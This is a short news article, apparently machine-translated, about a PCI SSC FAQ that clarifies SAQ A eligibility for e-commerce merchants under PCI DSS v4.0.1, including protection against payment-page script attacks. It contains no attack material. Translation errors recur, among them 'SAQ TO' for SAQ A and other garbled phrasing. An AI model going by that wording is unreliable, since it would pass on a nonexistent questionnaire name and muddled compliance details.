The PCI Security Standards Council (PCI SSC) has announced the launch of a section of frequently asked questions (FAQ) intended to provide greater clarity on the new eligibility criteria for the Self-assessment questionnaire (SAQ) TO recently updated. This initiative responds to requests from the industry and reaffirms the commitment of PCI SSC to provide clear guidance and practice to e-commerce merchants.
With the arrival of the version PCI DSS v4.0.1, which will take place on the April 1, 2025, it is crucial that traders understand the new requirements and be prepared to comply with them.
New eligibility criteria for the SAQ A PCI DSS v4.0.1
To comply with the eligibility criteria of the SAQ TO r1 of PCI DSS v4.0.1merchants should confirm that your web site is not vulnerable to attacks of scripts that might compromise the security of e-commerce systems.
Faq 1588 provides guidance on how merchants can verify this security through two main options:
- Implementation of security measures on your website:
- Using techniques recommended in the Requirements 6.4.3 and 11.6.1 of the PCI DSS to protect the site from attacks of scripts aimed at the data from the account.
- These techniques can be implemented directly by the merchant, or through an external provider specialized.
- Confirmation on the part of third-party service providers (TPSP)/payment processors:
- To obtain warranty that the payment providers that are compatible with the PCI DSS have implemented solutions that protect the payment page of the merchant of attacks of scripts.
- Protection is applied when the merchants implement the solutions of TPSP in accordance with the instructions of the supplier.
Who applies the SAQ TO
The SAQ TO only applies to to e-commerce merchants using a form or page of integrated payment provided by a TPSP/payment processor, using items such as iframes.
The SAQ TO not applicable to:
- Merchants that redirect your customers to the checkout page from a TPSP (for example, through redirects HTTP 30x, meta tags or JavaScript).
- Merchants who outsource completely the function of payment sending to the customer a link to the platform of the TPSP.
Recommendations for merchants
Merchants should work in close collaboration with its payment service providers to ensure a safe implementation of payment solutions. In addition, it is advisable to consult with your acquirer or the payment brands relevant to confirm if the SAQ A is the self-assessment questionnaire is appropriate for your specific environment.
Additional resources
The new section of frequently asked questions PCI SSC it is already available on its web site. These resources provide detailed information on the security of the data and the validation criteria, helping retailers to better understand their responsibilities and to reduce the uncertainty in the performance of PCI DSS v4.0.1.
With this new resource, the e-commerce merchants can move forward in your process of validation with greater confidence, to strengthen the security of payments and ensuring compliance with the latest standards in the industry.
Source: PCI
You may also like: Colombia Advances in the Regulation of Criptomonedas
